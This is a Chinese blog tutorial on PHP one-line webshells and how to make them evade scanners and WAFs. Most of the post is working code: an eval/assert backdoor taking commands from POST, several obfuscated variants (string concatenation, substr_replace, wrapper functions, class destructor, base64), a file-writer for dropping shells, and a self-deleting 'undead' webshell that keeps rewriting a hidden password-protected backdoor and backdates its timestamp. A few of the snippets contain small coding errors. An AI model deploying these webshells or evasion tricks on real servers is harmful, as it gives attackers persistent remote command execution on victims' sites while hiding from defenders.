一句话木马及免杀

最新推荐文章于 2024-04-14 05:32:51 发布
最新推荐文章于 2024-04-14 05:32:51 发布
阅读量1.4w 收藏 128
点赞数 14
分类专栏: Web安全 php 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46270220/article/details/113745113
版权

这篇文章主要是总结一句话木马,并实现一句话木马的简单免杀,以及一个不死马的实现。

文章目录

一句话木马及原理

首先,来看最简单的一句话木马:

<?php @eval($_POST['cmd']); ?>

前面的<?php ?>是php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_POST['cmd']应该都很熟悉了,通过cmd这个参数post提交数据。
举个例子,我在网站根目录下写入一句话木马
在这里插入图片描述
随后在127.0.0.1/index.php中,post提交cmd的数据为phpinfo();,出现了相应的界面,可以看到出现了命令执行漏洞。
在这里插入图片描述
除了这样命令执行,还可以用蚁剑、菜刀进行连接。

一句话木马简单免杀

从上面的演示中可以看到一句话木马的简单、高效,但就是因为其过于简单,查杀起来也很方便,所以要对其进行变形,让它不容易被发现。以下是几个免杀方法:

一、assert()

如果过滤了eval,可以使用assert绕过

assert() 会检查指定的 assertion 并在结果为true时执行

<?php @assert($_POST['cmd']); ?>

二、字符串拼接

当过滤了eval、assert两个关键字时,可以用字符串拼接的方式。介绍substr_replace()函数

substr_replace(string,replacement,start,length)

参数描述
string必需,规定检查的字符串。
replacement必需,规定要插入的字符串。
start必需,规定在字符串的何处开始替换。若为0,从头开始。
length可选。规定要替换多少个字符。默认是与字符串长度相同。
<?php
	$a=substr_replace("assexx","rt",4);
	@$a($_POST['cmd']);
?>

在这个马中,是将第四位和第五位,也就是xx替换成rt,最终拼接成为assert

除了substr_replace(),还有一种拼接方法

<?php
	$a="a"."s";
	$b="s"."e"."rt";
	$c=$a.$b;
	$c($_POST['cmd']);
?>

三、函数

可以利用函数来构造一句话木马

<?php
	function shyshy($a){
	assert($a);
	}
	@shyshy($_POST['cmd']);
?>

先是构造了shyshy()这一函数,然后调用函数,变成一句话木马。

四、request请求

适用于过滤了GETPOST的情况下

<?php
	$a=$_REQUEST['cmd'];
	$b="\n";
	eval($b.=$a);
?>

五、类

可以构造一个类,利用魔术方法来拼接

<?php
	class shyshy{
		public $a='';
		function __destruct(){
			assert("this->$a");
			}
		}
		$b=new shyshy();
		$b->a=$_POST['cmd'];
?>

六、base64加解密

<?php
	$a=base_decode(YXNzZXJ0);
	$b=$a(base64_decode($_POST['cmd']));
?>

七、写入木马

<?php
	if(isset($_POST['filename']))
	{
		$d='data';
		$$d=$_POST['text'];  //$data
		$f='fp';
		$$f=fopen($_POST['filename'],'wb');  //$fp
		echo fwrite($fp,$data):"save success":"save fail";
		fclose($fp);
	}
?>

这个代码通过在网站根目录下写一句话木马的方法,然后再去访问木马,从而getshell。

不死马

<?php
	ignore_user_abort(true);  //设置与客户机断开是否会终止脚本的执行,true则不会
	set_time_limit(0);  //如果为零说明永久执行直到程序结束
	unlink(__FILE__);  //调用unlink()的时候,文件还是存在的,只是目录里找不到该文件了,但是已经打开这个文件的进程可以正常读写
	$file='./.index1.php';
	$code='<?php
		if(md5($_POST["pass"])=="xxxxxxxxxx")  //给木马设置密码,防止他人使用
		{
			@eval($_POST["cmd"]);
		}?>';  
	while(1){
		file_put_contents($file,$code);
		system('touch -m -d "2018-12-01 9:10:12" .index1.php');  //设置文件的编辑时间
	usleep(5000);
	}
?>

实测时发现设置文件编辑时间那里会报错,可以选择把那一句删掉。
用法:?pass=shyshy&cmd=phpinfo();

Lum1n0us
关注
  • 14
    点赞
  • 128
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
一句话木马要点和防范注意事项
2401_84235249的博客
06-04 733
一句话木马”通常指的是那些简短、易于隐藏或不易被检测到的恶意代码片段,这些代码可能被用于执行恶意活动,如窃取信息、控制受害者的系统等。然而,我必须强调,传播或使用任何形式的恶意软件(包括所谓的“一句话木马”)都是非法的,并且严重违反了网络安全和隐私的原则。权限管理:合理设置服务器和应用程序的权限,避免不必要的权限提升,是防止一句话木马的重要手段,但这也需要管理员具备一定的安全知识和经验。防止注入:防止代码注入是防止一句话木马的关键,但这也是一个技术难题,需要开发者具备一定的安全编程技能。
一句话木马
热门推荐
qq_53065516的博客
03-27 2万+
一:一句话木马:标准代码形式:<?php @eval($_POST[‘attack’]) ?> eval()函数表示括号内的语句字符串什么的全都当做代码执行POST[‘attack’]表示从页面中获得attack这个参数值。常见形式:php一句话木马:<?php@eval(_POST[‘attack’]表示从页面中获得attack这个参数值。 常见形式: php一句话木马: <?php @eval(P​OST[‘attack’]表示从页面中获得attack这个参数值。常见形式:p
php免杀大马一句话,过主流waf
06-20
PHP语言异常灵活,日站的时候经常被waf拦截,于是花了点时间弄了个免杀PHP大马,减小了体积,测试安全狗云锁阿里云360主机卫士全都过。上传换点积分。没积分的在这儿下 https://pan.baidu.com/s/1dF5rfVF
渗透测试-流量加密之冰蝎&
道阻且长,行则将至。
11-08 1万+
文章目录前言 前言
一句话木马免杀
liushaojiax的博客
01-09 466
链接:https://pan.baidu.com/s/1t3DVuSHitZ7gPcywXnXwVA?upload是php写的需要搭建php环境推荐phpstudy。可以看到已经拦截到上传的图片,现在可以更改文件后缀;可以看到已经上传成功了然后右键获取到图片地址。由于有上传限制我们将写的木马文件改为png。注意:由于电脑有安全管家,这样写是不行的。5、bp拦截文件,打开谷歌代理和bp拦截。2、安装谷歌代理,Burp、;1、搭建靶场upload。6、使用获取靶机。双击就可以获取到靶机。
一句话木马免杀,看完99%的人都学会了
最新发布
2401_83739727的博客
04-14 999
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
一句话木马以及免杀
抚琴
01-08 3872
此篇只讨论php,其实原理是相同的,本文的思路依然适用于其他语言 WAF一般都是维护一个规则库,记录webshell常用的函数、方法等等,通过这个规则库匹配从而检测是否是木马.当匹配上对应特征时就是告警,但是规则匹配肯定会有误报,waf一直告警也很烦,所以waf一般会稳定为首要目标,也会放宽一下规则,这就是绕的基础 查杀软件我首先:D盾 『D盾_防火墙』专为IIS设计的一个主动防御的保护软件,以内外保护的方式 防止网站和服务器给入侵,在正常运行各类网站的情 况下,越少的功能,服务器越安全的理念而设计!限制了
简单的一句话木马免杀
2301_77927094的博客
12-21 595
php的文件格式,@是让程序在执行错误的情况下也不要报错,eval()函数是将括号里的内容都当作代码执行,$_POST['cmd']通过cmd这个参数post提交数据。从上面的演示中可以看到一句话木马的简单、高效,但就是因为其过于简单,查杀起来也很方便,所以要对其进行变形,让它不容易被发现。可以看到普通的一句话木马能被低版本的D盾直接扫出,所以免杀必不可少。可以看到这种方法绕过了2.0.8版本的D盾,初步可以得知这个版本的D盾使用的是关键字特征查杀。必需,规定在字符串的何处开始替换。
php简短一句话木马免杀,免杀/一句话木马(PHP)
weixin_39598568的博客
03-13 2364
前言在打CTF或渗透时,经常会遇到waf,普通的一句话木马便会被检测出来,打CTF还好,如果是渗透测试那么就有可能直接封IP,而且会发出报警信息。所以要掌握一句话木马免杀。Webshell检测方式网上有很多免杀一句话木马,但是如果不知道主流杀毒或waf的检测方式,也只是类似爆破而已,运气好了能进去,运气不好就换下一个payload。因此在此之前,先来了解一下都有哪些检测方式。日志检测使用Web...
木马免杀只需要简单一句话php
02-12
木马免杀只需要简单的一句话代码php文件就可以轻松过,可以参考
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
免杀PHP大马过狗
06-13
PHP后门通常是一段简短的、能够执行特定命令的PHP代码,被称为“一句话木马”,这与给定的标签“一句话”相符。这些后门可能隐藏在正常代码中,或者伪装成看似无害的文件,例如在本例中的“php免杀大马过狗狗.php”...
一句话的艺术-web提权.pdf
01-25
一句话的艺术-web提权】是关于网络安全中的一种高级技巧,主要涉及如何在Web环境中,即使在存在各种安全防护措施的情况下,依然能够通过“一句话木马”执行任意代码。这篇文章主要探讨了如何在Web应用程序中绕过...
ctfshow 吃瓜杯 shellme_Revenge
Lum1n0us's Blog
08-16 1593
文章目录前言自增题目wp 前言 在这次ctfshow的吃瓜杯比赛中,出现了一道利用自增运算符来造成命令执行的题目shellme_Revenge,以前只学过异或、或和取反的方法,因此这次来学习一波 主要是参考p神的文章一些不包含数字和字母的webshell 自增 在php中,当把字符串和数组连接在一起时,最终返回的值是Array <?php echo ''.[]; 且php中a++ => b,b++ =>c,那么只要取Array中的第一个字母A和第四个字母a,就可以得到A-Z和a-z的所
命令执行绕过姿势总结
Lum1n0us's Blog
02-05 1365
在刷完ctfshow web入门的命令执行后,我准备用这篇博客回顾下命令执行的知识点,也为了以后遇到相似的知识点时方便查阅。(目录的名字都是自己想的) 过滤关键字 1.关键字替换 当cat命令被过滤时,可以用以下命令代替: tac|more|less|curl|nl|tail|sort|strings|head|paste|od -a strings:显示文件中的可打印内容,一般用来查看非文本内容 sort:可针对文本文件的内容,以行为单位来排序。 curl:会发送 GET 请求来获取链接内容到标准输出
php特性绕过总结
Lum1n0us's Blog
03-18 438
ctfshow中web入门的php特性已经刷完了,总结一下在做题时遇到的一些关键函数和部分绕过姿势,方便以后的查看。 文章目录intval()函数strpos()函数md5()函数md5弱比较md5强比较md5强碰撞sha1()函数运算符优先级反射类ReflectionClassereg()函数异常处理类FilesystemIterator类全局变量GLOBALS最大回溯次数绕过无字母数字的rce异或或取反 intval()函数 int intval ( mixed $var [, int $base =
php反序列化字符串逃逸学习
Lum1n0us's Blog
07-20 335
文章目录前言反序列化特点反序列化字符串逃逸逃逸后字符串变长web262 wp逃逸后字符串变短 前言 最近在刷ctfshow的web入门反序列化题目时,正好遇到了字符串逃逸的问题,就跟着群主的讲解视频和网上大佬的文章来学习一下。 反序列化特点 PHP 在反序列化时,底层代码是以 ; 作为字段的分隔,以 } 作为结尾(字符串除外),并且是根据长度判断内容的 ,同时反序列化的过程中必须严格按照序列化规则才能成功实现反序列化 。 看如下代码: <?php class a{ public $a = "sh
PHP session反序列化漏洞
Lum1n0us's Blog
08-12 274
文章目录session反序列化ctfshow web263 wp session反序列化 看群主的讲解视频,顺便做个笔记。 先在本地做个测试,在index.php中写如下代码 <?php session_start(); $_SESSION['aaa'] = 'bbb'; 此时php的临时目录(tmp)中没有任何文件,然后访问http://127.0.0.1/,清除所有的cookie,然后再次访问,发现又生成了一个PHPSESSID 而此时tmp文件夹中也有一个临时文件sess_u8or65tg
php一句话木马免杀
08-03
引用[1]中提到了一个关于PHP一句话木马的实验,该木马成功骗过了阿里云的检测。木马的代码被放置在服务器的php文件夹下的miansha.php文件中。该木马使用了一些技巧来绕过检测,比如设置了执行时间限制和忽略用户中止请求。木马会在循环中不断将自身代码写入一个名为phpinfo.php的文件中。[1] 引用[2]中提到了生成的phpinfo.php文件的代码。该代码使用了一些字符串替换和反转的技巧来隐藏真正的恶意代码。该木马会检查传入的GET参数,并与预设的MD5值进行比较,如果匹配则执行一些操作。[2] 引用[3]中提到了一个关于组装代码的过程,通过使用之前准备好的函数和字符串,将需要的语句拼接成一个匿名函数。[3] 总结来说,PHP一句话木马免杀是指通过一些技巧和手段来绕过安全检测,使木马代码能够成功执行而不被发现。这些技巧包括设置执行时间限制、忽略用户中止请求、使用字符串替换和反转等。然而,这种行为是非法的,违反了计算机安全和隐私保护的原则。建议用户遵守法律法规,不要从事任何违法活动。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Lum1n0us

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值